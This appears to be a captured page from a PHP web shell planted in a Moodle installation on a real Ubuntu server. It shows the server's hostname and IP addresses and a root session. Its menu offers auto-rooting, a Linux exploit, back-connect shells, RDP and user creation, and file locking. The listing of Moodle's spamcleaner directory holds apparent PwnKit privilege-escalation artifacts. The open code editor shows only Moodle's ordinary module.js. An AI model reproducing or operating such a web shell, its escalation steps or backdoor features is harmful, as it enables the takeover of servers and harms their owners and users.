Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
admin /
tool /
spamcleaner /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
index.php
12.79
KB
-rwxrwxrwx
module.js
3.85
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
settings.php
1.25
KB
-rwxrwxrwx
version.php
1.07
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : module.js
M.tool_spamcleaner = { Y: null, row: null, me: null, del_all: function() { var context = M.tool_spamcleaner; var yes = confirm(M.util.get_string('spamdeleteallconfirm', 'tool_spamcleaner')); if (yes) { var cfg = { method: "POST", on: { success : function(id, o, args) { try { var resp = context.Y.JSON.parse(o.responseText); } catch(e) { alert(M.util.get_string('spaminvalidresult', 'tool_spamcleaner')); return; } if (resp == true) { window.location.href=window.location.href; } } } }; context.Y.io(context.me+'?delall=yes&sesskey='+M.cfg.sesskey, cfg); } }, del_user: function(obj, id) { var context = M.tool_spamcleaner; if (context.Y == null) { // not initialised yet return; } var yes = confirm(M.util.get_string('spamdeleteconfirm', 'tool_spamcleaner')); if (yes) { context.row = obj; var cfg = { method: "POST", on: { success : function(id, o, args) { try { var resp = context.Y.JSON.parse(o.responseText); } catch(e) { alert(M.util.get_string('spaminvalidresult', 'tool_spamcleaner')); return; } if (context.row) { if (resp == true) { while(context.row.tagName != 'TR') { context.row = context.row.parentNode; } context.row.parentNode.removeChild(context.row); context.row = null; } else { alert(M.util.get_string('spamcannotdelete', 'tool_spamcleaner')); } } } } } context.Y.io(context.me+'?del=yes&sesskey='+M.cfg.sesskey+'&id='+id, cfg); } }, ignore_user: function(obj, id) { var context = M.tool_spamcleaner; if (context.Y == null) { // not initilised yet return; } context.row = obj; var cfg = { method: "POST", on: { success : function(id, o, args) { try { var resp = context.Y.JSON.parse(o.responseText); } catch(e) { alert(M.util.get_string('spaminvalidresult', 'tool_spamcleaner')); return; } if (context.row) { if (resp == true){ while(context.row.tagName != 'TR') { context.row = context.row.parentNode; } context.row.parentNode.removeChild(context.row); context.row = null; } } } } } context.Y.io(context.me+'?ignore=yes&sesskey='+M.cfg.sesskey+'&id='+id, cfg); }, init: function(Y, me) { var context = M.tool_spamcleaner; Y.use('json', 'io-base', function (Y) { context.Y = Y; context.me = me; if (Y.one("#removeall_btn")) { Y.on("click", context.del_all, "#removeall_btn"); } }); } }
Close